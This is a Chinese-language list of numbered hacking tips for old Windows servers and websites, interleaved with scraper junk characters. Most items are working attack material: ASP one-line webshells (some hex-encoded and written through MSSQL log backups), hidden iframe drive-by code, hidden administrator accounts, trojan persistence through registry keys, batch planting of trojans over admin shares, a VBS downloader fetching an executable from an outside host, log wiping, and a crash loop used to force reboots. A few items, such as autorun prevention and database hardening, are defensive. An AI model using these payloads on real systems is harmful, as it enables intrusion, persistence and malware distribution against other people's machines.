1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
1 T5 b% U% L# g7 n+ }& K9 Pcacls C:\windows\system32 /G hqw20:R" d- j S7 d+ g) @, J2 E, H; j
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
" i3 s5 ~/ ?3 t恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F% i* a- C% O: j% N( z8 c
- W2 O2 r; ]1 t3 `2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。- T5 A j" N: V$ ~+ ^+ I
& Q4 R' _( z) b; L# F
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。' E+ S9 B7 h8 V: @# o$ _
# ~ D0 o- w7 T8 g( H' l
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号) J* H& G5 c8 o( [: Z7 a& u+ E G% |
% Y3 I3 c! e' {1 ^1 v- `5、利用INF文件来修改注册表( s6 s+ x4 B. s" B: p" ~ X- H* F
[Version]
8 Q8 ~, R% I7 fSignature="$CHICAGO$"( i4 }# p& u$ y R
[Defaultinstall]" l. S5 k8 A5 X
addREG=Ating5 C, k4 z; f6 V' N# E) s: t4 M G
[Ating]
M4 i1 e8 {4 P GHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
6 z) i/ [$ ]5 [' q: x以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
2 Q+ ?3 K6 Z% Prundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
8 M! I0 u1 Y8 E其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
& V; F5 r9 F$ L% o2 FHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU( a: {' e) Z: g, ]- {% J
HKEY_CURRENT_CONFIG 简写为 HKCC! f0 N, _6 }; D+ M
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值" N9 w+ m) L+ n; l; T8 u9 U
"1"这里代表是写入或删除注册表键值中的具体数据3 V/ v; r+ R6 V* ~
: Y4 D& M) |+ F$ ]/ _- e6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,; [% e0 f" @6 Z7 v( b
多了一步就是在防火墙里添加个端口,然后导出其键值3 \! H! E% F" Q% H
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
5 B$ W7 a* O& t5 p0 `/ ]% `4 V
: h7 w: y- B: U% [7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽$ L& h( S, z0 q, L
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
L2 W: F( p1 D7 t* R4 N* ]
* p/ e6 j; _: h) g8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。: k& a3 L. c& u8 B; }
, z2 U. |. G M* i3 ]3 w8 M* q
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
2 [6 K# U0 _+ j1 r) ?3 `# _6 T可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。3 g3 J. |2 k$ g# ^+ C1 k$ y1 f
: \6 Y) h# h: E. C# X10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
' `9 M" T# V1 Y! @- C! N% n' T3 A
. s/ g+ _# U Z/ K% m7 Y: c+ j11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,% L6 d& e5 I% w$ w
用法:xsniff –pass –hide –log pass.txt/ m: f& D) H# s5 a3 ]& Q
. s' h d" t) K. d/ X1 _+ L% S
12、google搜索的艺术
, U* Y! c" j; O搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
5 r: r. S% G$ U$ e或“字符串的语法错误”可以找到很多sql注入漏洞。$ N. z' t" X4 q; P X, j1 \
$ X! L4 F9 ^; M$ E6 [
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。* u! _% c! h# ]" A d
8 u+ C/ y; \( D" z
14、cmd中输入 nc –vv –l –p 19870 P: L' k ^8 m& T# n
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
) k; |' p- A1 A" z5 k" F0 Z1 W7 Q" k. ]% r. p% B) v
15、制作T++木马,先写个ating.hta文件,内容为, u! a, v: t' `; B
<script language="VBScript">
' T6 p- R: `/ x& yset wshshell=createobject ("wscript.shell" )6 d! M* Y% H1 {3 S7 |
a=wshshell.run("你马的名称",1)
! T& I9 A/ d* w( Z; u( ? [window.close
9 X/ l* n7 T8 }</script>, Y1 x6 X: l. j6 c7 @9 z
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。. Q2 Q: R$ }! O9 T6 G3 y1 t0 Y
$ X- [# f' H; x: A) ]9 i
16、搜索栏里输入
1 @2 m* p" M# G关键字%'and 1=1 and '%'='
" ]8 Y" M. T# E' Z# c关键字%'and 1=2 and '%'='9 a; f* X% {: L, a
比较不同处 可以作为注入的特征字符
0 W' R2 }& U- ^) `' ] [) \. f3 s& X2 e6 S5 [
17、挂马代码<html>4 H2 o9 u6 P. ^' m2 u3 E
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
u2 M/ h5 e; B: H</html>7 T( ?0 z4 r" u# u7 \
_: [4 G- R$ t# M% J
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,' E! l* ]* o9 n9 `
net localgroup administrators还是可以看出Guest是管理员来。
a# _/ a% n, A0 s, z9 K( \9 ~. j- @
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
* a, y5 K& f* H, B: |8 x% [' y用法: 安装: instsrv.exe 服务名称 路径4 E" P+ j$ m5 r) j( Y
卸载: instsrv.exe 服务名称 REMOVE$ z5 @: y' A ^" Q4 u" x
* ]; S* o2 P2 P8 N1 N! j
% A! j- U: K* T4 H' d/ z/ u7 j21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
2 N* V6 c9 ^" D' S, c" r不能注入时要第一时间想到%5c暴库。
' }) i* i4 b9 p w
6 d* k! j) i w4 C N5 F+ s22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~/ s' m: W; m- {2 ]0 v0 R+ m1 p
( n+ w6 k4 z+ h7 y% c
23、缺少xp_cmdshell时2 ^+ _* s6 ]* N8 [& h
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'% N9 O& d% @% |) C
假如恢复不成功,可以尝试直接加用户(针对开3389的)
# ?6 \( S: s( u9 ] g; a% d) C' ?$ tdeclare @o int
# a, i' d* L' g9 P) |: }) J5 x8 sexec sp_oacreate 'wscript.shell',@o out0 t; U6 q0 L2 d8 u& W- e. \0 x
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
4 z: Q4 q) N9 e9 H' J
9 ?0 O* N' g; G7 h: x: e. `24.批量种植木马.bat8 W$ j! X9 I* L
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中& @" ]- d3 O- E/ j3 |8 N
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间2 i" u. k* Z9 F* y8 r& A3 w
扫描地址.txt里每个主机名一行 用\\开头# ^' S! x9 x o6 j2 H# n9 Q4 ~
+ X( f4 N/ {1 i" M# t' m
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
3 v! I' [9 ^; f+ `. {+ q
4 d+ Q a8 }. I3 S/ T26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
& h: p" y" A! q* c# Z将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
9 h5 b1 W+ J- W4 x% i4 l& v.cer 等后缀的文件夹下都可以运行任何后缀的asp木马 |2 s g, p: i7 G4 b7 f; G7 Y- ~
" {! _: B" V" u s% }27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP1 C( b: ?1 ~" l: R2 Q
然后用#clear logg和#clear line vty *删除日志/ ?: K7 c" u2 t( B/ ` O& x# Y3 y) L, H
( V7 [' |+ a( X7 o! M2 }28、电脑坏了省去重新安装系统的方法
3 \: _9 Y, L: X! g( V纯dos下执行,
4 ^9 p3 u& p7 M. ?3 a8 [xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config- G/ e6 {1 r& K! y& V& M& w8 E
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config l! `% b1 J$ Q
% c, { {( t: j3 K! P" `
29、解决TCP/IP筛选 在注册表里有三处,分别是:
! n) A8 x2 Q9 [* G0 ~" d l, ?/ MHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip1 A& W; S0 @% J+ |
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
* z9 y8 M6 i6 {9 R, I: VHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" w+ D; w& f% b! o( D; w6 \
分别用
3 @/ h3 j1 Q# C rregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip j5 U3 q4 t z5 E
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip. P& @! G' }2 e+ i
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 S. R4 d8 D! }. `6 M* {
命令来导出注册表项0 j0 {# A2 l$ D* l3 Y& g* k- t
然后把三个文件里的EnableSecurityFilters"=dword:00000001,! e" \$ }1 u+ M" v5 j: G( \" ^
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
" e+ ^/ y z: z0 a* g+ r5 M/ Uregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
4 n1 i, Y& r9 A: B& H* O! `1 B
5 m9 C* f m ^30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U$ y! N( J9 P: @& }0 W, V
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3/ ?& K0 j& K3 D5 |. ?* }" Q
9 o6 [4 P) G- ~: h31、全手工打造开3389工具8 d+ u6 i% |8 @" S0 k( f
打开记事本,编辑内容如下:
9 `, ?' q/ u" D8 Z# J# F oecho [Components] > c:\sql6 c+ S! j% [5 U3 Z6 B
echo TSEnable = on >> c:\sql
! q( f9 g2 S T6 S8 S$ ~* Rsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
! |% \8 t9 Q8 t7 n$ m编辑好后存为BAT文件,上传至肉鸡,执行
% i7 D- A, C) v8 }- v2 j8 L8 z9 N& t K& Z) i' D$ K l
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马4 X* t M: `; E) z7 s; W
1 S8 f& S6 o# L* f9 a8 g, T
33、让服务器重启8 {1 A6 h+ \# k
写个bat死循环:
# x3 A2 w* e% H@echo off9 R) z" r6 `- j. N- Q1 D7 c
:loop1
% ?- `0 y2 i* D8 Pcls
# u7 o$ b, z: Xstart cmd.exe# m; H1 _1 _1 u7 L' a
goto loop1
& G. R$ j$ J3 E7 U! R保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
+ A1 ~+ W2 g1 o% Y1 m
1 A2 H5 T% k8 _) v* s. ~34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,4 q2 `: _+ d/ A/ h- C
@echo off' o2 N' D, h) K# U) }3 Z' v( g+ T
date /t >c:/3389.txt
+ G# H8 v3 U) N f. Dtime /t >>c:/3389.txt$ u4 ]% ^5 A0 f6 K/ O
attrib +s +h c:/3389.bat
* k! H# |# f/ q5 H. Rattrib +s +h c:/3389.txt) k# N- W$ Q, f* [
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
* @% {. ^5 _( Y6 U并保存为3389.bat
: ~& f( _0 U1 R) P打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号# `+ B7 @$ ?& a) A8 q
* N6 }8 C: `! |& t; \8 M35、有时候提不了权限的话,试试这个命令,在命令行里输入:
T" O/ n5 V9 c4 Y4 \start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
) ]% y' }- I, C- Y+ Z输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
- l8 k2 s. P' W0 a
( u$ g/ e- u. k0 O" p+ S6 d36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件$ B y# S( |# h3 D" P3 Z1 y E
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
2 H' d) C, j& w8 y1 K: [echo 你的FTP账号 >>c:\1.bat //输入账号/ n, l% c; D$ C1 s _; B
echo 你的FTP密码 >>c:\1.bat //输入密码% E' U) F4 r% @$ K. ~/ O/ r
echo bin >>c:\1.bat //登入8 S: C) N! i: M8 ~" Q. {
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么6 {: r# y ]; |' W G
echo bye >>c:\1.bat //退出3 J- Y6 \7 _2 O) K9 t( m
然后执行ftp -s:c:\1.bat即可
& |9 E6 C- |+ i2 c
2 ~; C$ b: k( N: Y! N) k37、修改注册表开3389两法
9 J' C/ h K; d(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
4 I( ]% o. D, T9 o2 Z' r6 pecho Windows Registry Editor Version 5.00 >>3389.reg
0 d+ Z) i' S6 A% P3 Secho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
3 h7 c) q+ V/ U C% oecho "Enabled"="0" >>3389.reg+ \# A! o" P/ ]) @
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows% f6 H6 y% y- ~; n3 E, b7 K
NT\CurrentVersion\Winlogon] >>3389.reg' c" u7 e. c& I6 f
echo "ShutdownWithoutLogon"="0" >>3389.reg+ A& B. y7 J. h
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
6 \4 J' B+ R/ W! a$ m>>3389.reg
4 `3 Z0 M% O( O$ `echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
. p8 L6 e1 q2 I# ]3 i# ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]4 ?! R2 O% B2 A0 C. x; A
>>3389.reg
5 D g* i# {% W5 becho "TSEnabled"=dword:00000001 >>3389.reg
6 b/ o+ C8 |/ Q( K1 Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg8 }% {% p2 h/ S T7 K+ j# Y
echo "Start"=dword:00000002 >>3389.reg
y2 z/ w ~. z0 @" e: W1 `8 @/ Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]3 D+ \/ Y7 \5 j# y5 `. {! ]5 P* y# a
>>3389.reg* v% U+ d2 P6 E0 ]; _
echo "Start"=dword:00000002 >>3389.reg( m* l& f+ P4 c: i# Q% o F7 f$ m) h( X# o
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg: v) g' I9 J+ L4 r9 y& ]$ a
echo "Hotkey"="1" >>3389.reg' z( _- n! [3 R: |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" Y/ H8 q6 \, P; P9 E+ cServer\Wds\rdpwd\Tds\tcp] >>3389.reg& ?7 v, q! M1 {' n; A4 K' [
echo "PortNumber"=dword:00000D3D >>3389.reg) Q8 h# S0 J! g6 y& D2 b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 N+ s& v. k a9 P+ B
Server\WinStations\RDP-Tcp] >>3389.reg
0 E* K' N Y7 M- B" Hecho "PortNumber"=dword:00000D3D >>3389.reg. G) m" i% Z7 s8 K0 E
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
1 A: g- G0 ^9 I(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)( F! y. Z# L; E" M2 [( J; h
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效7 w( |2 W% h$ W# g6 b4 j- _
(2)winxp和win2003终端开启
9 U# T' @0 X& ^用以下ECHO代码写一个REG文件:
6 N2 z P7 [# |! w; Gecho Windows Registry Editor Version 5.00>>3389.reg
. R2 h. S. e( ?$ B6 ?6 ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, R+ q: b9 b" EServer]>>3389.reg- W% E; T! {/ w4 x, t3 \! E
echo "fDenyTSConnections"=dword:00000000>>3389.reg* v8 m; x; \, H! X2 e7 O/ x# V8 Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal, s2 n" Y ]0 N$ ]* G0 s. M" w
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
( N- e8 F1 Q5 k; ]+ |4 m+ W) oecho "PortNumber"=dword:00000d3d>>3389.reg
' q+ v& i+ e8 q* u% t) S$ A% n; Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" j7 E# f# h! rServer\WinStations\RDP-Tcp]>>3389.reg
0 t- Q* K3 `6 A. a) X5 ]echo "PortNumber"=dword:00000d3d>>3389.reg' |6 |$ b- E' L. `5 U& O+ ]
然后regedit /s 3389.reg del 3389.reg
! w% u2 {' s+ ~ T& q4 _! b. B% HXP下不论开终端还是改终端端口都不需重启
K; p: J2 W: w( S; c/ @% b6 w) |5 K+ p
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃3 D% w- v I% @: p1 G
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
0 @) C: {. b" a9 E6 r \/ h. F2 S* W4 d
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!& A2 O" s' r% j: G! |: A# d# v
(1)数据库文件名应复杂并要有特殊字符4 O3 m6 T1 f0 }, C' s2 L
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
; Y% b0 B) ]" c7 B0 y$ X$ u将conn.asp文档中的
& ?; I. n% N+ G. pDBPath = Server.MapPath("数据库.mdb")3 `. R- }! p3 X
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
5 a1 J+ a- C. W5 K9 |* ]! N9 G r9 I
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
8 t0 h9 Y! [ r D1 h(3)不放在WEB目录里
1 b/ M1 x' i5 r6 b. x7 x9 x* T F, G- r# b6 F2 t( }, N
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉' H' R5 q+ a4 f) I8 M
可以写两个bat文件0 L$ s2 {( y) v3 w( J
@echo off0 C V6 H7 I$ B
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe4 m: L4 ?& m1 u8 k0 u- q
@del c:\winnt\system32\query.exe
) y- `6 q" q8 G$ h$ Y+ p3 B% T@del %SYSTEMROOT%\system32\dllcache\query.exe' m# U3 _% O; ^
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的0 ^3 ], W' V/ P q& Y. H4 V
4 e& _1 o |( ~) q8 ? [% [
@echo off6 e) D/ S4 h* ?
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe+ h- C) q8 c- f
@del c:\winnt\system32\tsadmin.exe' D8 c `" H1 J! h4 ]- i! P
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex/ q% ^$ g- C+ C9 o8 X6 ?: ?" i+ L
: w ?1 x- e4 l1 ~6 f' u- R$ R: W! u
41、映射对方盘符
@, p7 l+ n3 s- k1 \9 \telnet到他的机器上,3 z" R: ]: ~# J1 B4 H4 I
net share 查看有没有默认共享 如果没有,那么就接着运行
5 O- A/ \+ t4 ~2 \5 C2 A6 H# ]: Hnet share c$=c:
9 C# o+ E# J- X! h+ Y) Enet share现在有c$: X! W$ F6 \) h( _' P4 `
在自己的机器上运行
( _- b8 |: ]+ U6 onet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
8 e6 f$ B; R5 e( C! \$ V- M% j0 S }# e/ Z' N
42、一些很有用的老知识
# k/ q" | J% P z, _( qtype c:\boot.ini ( 查看系统版本 )
0 j1 J/ _6 ] t F* `7 q) ~9 r3 Enet start (查看已经启动的服务)6 q6 `* J. q+ o7 L
query user ( 查看当前终端连接 )9 p4 t8 Q0 O @
net user ( 查看当前用户 )
! i( ~/ K5 C b, |) W! m. Cnet user 用户 密码/add ( 建立账号 )
' @$ Q0 `* T+ l9 L0 G: p. Inet localgroup administrators 用户 /add (提升某用户为管理员)
3 r" f+ R% j6 qipconfig -all ( 查看IP什么的 )' ]6 C9 ^5 d) W0 |
netstat -an ( 查看当前网络状态 )4 E* d+ c' N3 V6 e. L5 b
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)1 x! ?9 E" h+ b& g
克隆时Administrator对应1F4. _$ x. s* \7 X) W
guest对应1F5 g- c; V" o2 U, I
tsinternetuser对应3E85 \, [6 `- c6 H" P" K3 c* S
( j* T+ A0 {6 j
43、如果对方没开3389,但是装了Remote Administrator Service# @+ V+ |5 U0 j: }5 t
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
& Z% E& C5 ?, h! h( N" B2 O解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
: f9 N& d: M- t+ m& f0 p/ S先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
8 d- Q: c$ W( x3 L& d O1 y2 s2 P. x; c/ g7 L: q0 P/ h
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
5 d3 f8 g2 u" X$ ~( [8 K本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)4 E1 E5 _; Q M4 o
% n2 G9 b9 e3 B( |; i( U45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)2 F) q8 S8 P# J
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open% I$ H" ^# h$ J- U3 `& ]' D
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
) W* w, r0 o5 qCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =5 J M. E$ f7 X) ^; z) @$ ]
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs% j- ^" Q# f8 `9 e9 X2 R- {
(这是完整的一句话,其中没有换行符)
- j! [. L3 X( b, r* L% L( f然后下载:
4 o) p ` i% ]0 bcscript down.vbs http://www.hack520.org/hack.exe hack.exe# j: d J; X5 I3 v- o. x
+ j5 I$ ? s# H; r, E( c" X$ y0 b
46、一句话木马成功依赖于两个条件:: O' ~9 g% ]1 J& y5 ^& c2 J
1、服务端没有禁止adodb.Stream或FSO组件
8 D# E. s: g4 K) t! ], ~4 _2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
9 [7 G% ?9 d& I' q
' \4 P7 B3 Q/ p4 F2 N) w47、利用DB_OWNER权限进行手工备份一句话木马的代码:
/ u% L# m& M, C7 K( I;alter database utsz set RECOVERY FULL--
7 |# \& b3 S) P# C+ Q# s;create table cmd (a image)--
6 k' R9 P! W3 F! a4 j+ e;backup log utsz to disk = 'D:\cmd' with init--% O5 H2 Y; o% u \9 }
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
! U6 P8 L' f8 ?% Q, p3 o9 J& ~;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--" s9 r6 X) Z0 m# e/ p/ o. C: ]( S
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。8 Q L, j& V" U4 \3 y
. L, G. K, H4 J* Z* H( |6 z) f48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:/ l6 Z; j9 `8 q8 G1 I
( O3 y: G, s G, h/ [$ i, R# j
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options5 M! P/ P, [: e2 z8 K
所有会话用 'all'。
7 u. l' D7 I8 ~! G2 s5 |) R! `) g-s sessionid 列出会话的信息。
. B" q: g7 | A! n: b, I5 q; A+ N-k sessionid 终止会话。
1 J& p7 v/ A; u5 ?7 A- S' d-m sessionid 发送消息到会话。- I- N, U- P; t4 N6 W( U( c6 r
4 s+ S/ ^# M6 F. O: j4 M
config 配置 telnet 服务器参数。1 g( M* J; x9 Q: Q5 b
/ s0 y. W' U$ Q1 A2 w' ecommon_options 为:. a( v( I2 G( L8 s1 D! W" j
-u user 指定要使用其凭据的用户
" m7 \ Q/ Z0 d6 e9 I; A: s-p password 用户密码% M+ l! P$ l" E+ r
- |( b& `& G. ]" I5 v
config_options 为:! H3 B+ N, H% g- E9 C
dom = domain 设定用户的默认域
- H t0 A" ~; ictrlakeymap = yes|no 设定 ALT 键的映射2 F' e% C1 Y2 u& t+ L
timeout = hh:mm:ss 设定空闲会话超时值
& T( ^4 T { k9 T. G( p1 _3 {4 qtimeoutactive = yes|no 启用空闲会话。, I* w6 A0 q- |; s' T# [
maxfail = attempts 设定断开前失败的登录企图数。
8 ^, T* [6 C+ B" t" F( F1 ^maxconn = connections 设定最大连接数。
: n4 V+ C1 K: d! Z, D `port = number 设定 telnet 端口。7 ~. @1 w' ^' j/ D+ U
sec = [+/-]NTLM [+/-]passwd, R' _8 T1 J8 U1 A8 i2 L8 r
设定身份验证机构" [6 J8 O9 u; @$ F3 V7 A
fname = file 指定审计文件名。
3 ^; i) W0 X4 Q! h: g Vfsize = size 指定审计文件的最大尺寸(MB)。
" [1 W# c5 D ?mode = console|stream 指定操作模式。% ~8 H+ _5 h `, e8 U
auditlocation = eventlog|file|both
: w/ `* U- }* n" e& j- X1 h! ^1 t指定记录地点
% o5 \! _7 y: }5 m) c) p8 taudit = [+/-]user [+/-]fail [+/-]admin) s+ M5 B. @& i
: b0 n) n: m1 B# A49、例如:在IE上访问:5 k4 [3 o; E, e6 i
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/$ S* l% n3 S Q( M" d2 o% Z7 o
hack.txt里面的代码是:
. n4 ?' B6 n: X1 G<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
# o U& n! C4 W* A把这个hack.txt发到你空间就可以了!$ `# R0 d$ X7 |
这个可以利用来做网马哦!
5 z' C Q4 x# ~. _" U; W
6 F/ B6 E$ i/ l* Q" B# R- ~50、autorun的病毒可以通过手动限制!
" W* t# F) b0 Q2 }1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
/ F% v8 J1 C0 k W2,打开盘符用右键打开!切忌双击盘符~
. K. b7 Z6 p. U& w5 l2 C3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
% U0 M9 \0 X# ? V) y/ l% t7 i* X. i1 f1 A. d) G
51、log备份时的一句话木马:
r) |' \# P4 F! ]* h8 D6 Aa).<%%25Execute(request("go"))%%25>
9 m7 ^. [& E% O% r* n2 yb).<%Execute(request("go"))%>
9 a% Z3 G3 D* Y e* Sc).%><%execute request("go")%><%
! j& K0 |& J- c5 D: |1 f5 _2 hd).<script language=VBScript runat=server>execute request("sb")</Script>4 f% b( j Q% h
e).<%25Execute(request("l"))%25>
! v1 L3 {' ]) i% `' a' kf).<%if request("cmd")<>"" then execute request("pass")%>8 z; B2 i% G2 Z( X( Q' j
3 q7 M; ^# o1 r; f1 L/ B- ~52、at "12:17" /interactive cmd
* G+ |# P+ n. |0 V& ]. _3 h执行后可以用AT命令查看新加的任务
3 u- j* L) q" L' n9 G用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
: |8 q) H. X0 |% S) L. ?. N4 t5 c4 {! L
53、隐藏ASP后门的两种方法
, l+ b$ W6 S9 h7 m) Q" M$ X1、建立非标准目录:mkdir images..\
